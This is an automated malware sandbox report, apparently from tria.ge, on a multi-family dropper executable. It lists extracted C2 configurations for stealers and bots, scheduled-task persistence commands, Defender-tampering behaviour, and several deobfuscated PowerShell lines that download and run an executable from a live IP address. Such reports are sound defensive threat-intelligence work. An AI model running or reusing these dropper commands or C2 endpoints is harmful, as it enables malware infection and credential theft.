Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

5

5f21f5677d...01.exe

windows7-x64

10

5f21f5677d...01.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/02/2025, 00:32 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe

  • Size

    938KB

  • MD5

    a395184a62ce20f7505664209dfc9b6d

  • SHA1

    fe2ae192812df97e9a24b41fd1b045e8cb8e2c90

  • SHA256

    5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201

  • SHA512

    ddbd56812b6839c3a4e7a360de9a0a5acb5f4f4f5676cb7f9f544131684d64d9c306b78781ce2b8ba511ad7aa88c43ae34c69fa0c0f936303400970e39476b10

  • SSDEEP

    24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8ayTF:KTvC/MTQYxsWR7ayT

Score
10/10
amadeycryptbothealerredlinesectopratstealcsystembcvidar9c9aa5cheatdefaultrenocredential_accessdefense_evasiondiscoverydropperevasionexecutioninfostealerpersistencepyinstallerratspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "PWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE"
2
(new-object system.net.webclient).downloadfile("http://185.215.113.16/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "CVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE"
2
(new-object system.net.webclient).downloadfile("http://185.215.113.16/defend/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "\\483d2fa8a0d53818306efeb32d3.exe"
2
(new-object system.net.webclient).downloadfile("http://185.215.113.16/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "VTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE"
2
(new-object system.net.webclient).downloadfile("http://185.215.113.16/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

systembc

C2

cobolrationumelawrtewarms.co:4001

93.186.202.3:4001
Attributes
  • dns

    5.132.191.104

    ns1.vic.au.dns.opennic.glue

    ns2.vic.au.dns.opennic.glue

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Extracted

Family

stealc

Botnet

default

C2

http://ecozessentials.com

Attributes
  • url_path

    /e6cb1c8fc7cd1659.php

Extracted

Family

cryptbot

C2

http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk17

Extracted

Family

vidar

C2

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190
Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

    spywarestealercryptbot
  • Cryptbot family
    cryptbot
  • Detect Vidar Stealer 11 IoCs
    stealer
  • Detects CryptBot payload 1 IoCs

    CryptBot is a C++ stealer distributed widely in bundle with other software.

    spywarestealer
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • Redline family
    redline
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 2 IoCs
  • Sectoprat family
    sectoprat
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

    trojansystembc
  • Systembc family
    systembc
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
    defense_evasion
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 25 IoCs
    defense_evasion
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 36 IoCs
  • Uses browser remote debugging 2 TTPs 14 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 46 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 58 IoCs
  • Identifies Wine through registry keys 2 TTPs 25 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 33 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 8 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 23 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Windows directory 6 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Detects Pyinstaller 1 IoCs
    pyinstaller
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 8 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 19 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 11 IoCs
  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 41 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe
    "C:\Users\Admin\AppData\Local\Temp\5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe"
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3384
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn No8Yrmaizfu /tr "mshta C:\Users\Admin\AppData\Local\Temp\5ohpgXHlP.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:884
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn No8Yrmaizfu /tr "mshta C:\Users\Admin\AppData\Local\Temp\5ohpgXHlP.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2392
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\5ohpgXHlP.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3344
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1680
        • C:\Users\Admin\AppData\Local\TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE
          "C:\Users\Admin\AppData\Local\TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4120
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:404
            • C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe
              "C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              PID:3364
            • C:\Users\Admin\AppData\Local\Temp\1088414001\8827e2f2e3.exe
              "C:\Users\Admin\AppData\Local\Temp\1088414001\8827e2f2e3.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4600
            • C:\Users\Admin\AppData\Local\Temp\1088415101\e4c9d2bfff.exe
              "C:\Users\Admin\AppData\Local\Temp\1088415101\e4c9d2bfff.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2224
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn mMcYJmaQuvZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\4etjqgqsj.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3648
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn mMcYJmaQuvZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\4etjqgqsj.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:400
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\4etjqgqsj.hta
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4360
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3352
                  • C:\Users\Admin\AppData\Local\TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE
                    "C:\Users\Admin\AppData\Local\TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE"
                    9⤵
                    • Modifies Windows Defender DisableAntiSpyware settings
                    • Modifies Windows Defender Real-time Protection settings
                    • Modifies Windows Defender TamperProtection settings
                    • Modifies Windows Defender notification settings
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Windows security modification
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2396
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1088416021\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4580
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1088416021\am_no.cmd" any_word
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2536
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 2
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Delays execution with timeout.exe
                  PID:1948
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4544
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1336
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1976
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4620
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:3344
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2868
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "fgakTma2NsJ" /tr "mshta \"C:\Temp\NcQpdvRJC.hta\"" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2176
                • C:\Windows\SysWOW64\mshta.exe
                  mshta "C:\Temp\NcQpdvRJC.hta"
                  8⤵
                  • Checks computer location settings
                  • System Location Discovery: System Language Discovery
                  PID:3500
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                    9⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Downloads MZ/PE file
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1132
                    • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                      "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                      10⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4604
            • C:\Users\Admin\AppData\Local\Temp\1088417001\0f807048bd.exe
              "C:\Users\Admin\AppData\Local\Temp\1088417001\0f807048bd.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3648
            • C:\Users\Admin\AppData\Local\Temp\1088418001\18b64e1917.exe
              "C:\Users\Admin\AppData\Local\Temp\1088418001\18b64e1917.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:3360
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 1520
                7⤵
                • Program crash
                PID:1680
            • C:\Users\Admin\AppData\Local\Temp\1088419001\90ced29b15.exe
              "C:\Users\Admin\AppData\Local\Temp\1088419001\90ced29b15.exe"
              6⤵
              • Enumerates VirtualBox registry keys
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:4104
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                7⤵
                • Uses browser remote debugging
                PID:5916
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe70f9cc40,0x7ffe70f9cc4c,0x7ffe70f9cc58
                  8⤵
                    PID:5928
              • C:\Users\Admin\AppData\Local\Temp\1088420001\40e0b6ad21.exe
                "C:\Users\Admin\AppData\Local\Temp\1088420001\40e0b6ad21.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:880
              • C:\Users\Admin\AppData\Local\Temp\1088421001\d2YQIJa.exe
                "C:\Users\Admin\AppData\Local\Temp\1088421001\d2YQIJa.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4544
              • C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe
                "C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                PID:3952
                • C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe
                  "C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:3052
                • C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe
                  "C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2512
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 796
                  7⤵
                  • Program crash
                  PID:3104
              • C:\Users\Admin\AppData\Local\Temp\1088424001\7aencsM.exe
                "C:\Users\Admin\AppData\Local\Temp\1088424001\7aencsM.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                PID:1948
                • C:\Users\Admin\AppData\Local\Temp\1088424001\7aencsM.exe
                  "C:\Users\Admin\AppData\Local\Temp\1088424001\7aencsM.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Checks processor information in registry
                  PID:4532
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                    8⤵
                    • Uses browser remote debugging
                    • Enumerates system info in registry
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    PID:400
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffe70f9cc40,0x7ffe70f9cc4c,0x7ffe70f9cc58
                      9⤵
                        PID:432
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1808,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1888 /prefetch:2
                        9⤵
                          PID:5028
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2352 /prefetch:3
                          9⤵
                            PID:1132
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2168,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2360 /prefetch:8
                            9⤵
                              PID:3404
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:1
                              9⤵
                              • Uses browser remote debugging
                              PID:4740
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1
                              9⤵
                              • Uses browser remote debugging
                              PID:1904
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4436,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4588 /prefetch:1
                              9⤵
                              • Uses browser remote debugging
                              PID:5140
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4548,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4476 /prefetch:8
                              9⤵
                                PID:5148
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4552,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4560 /prefetch:8
                                9⤵
                                  PID:5244
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
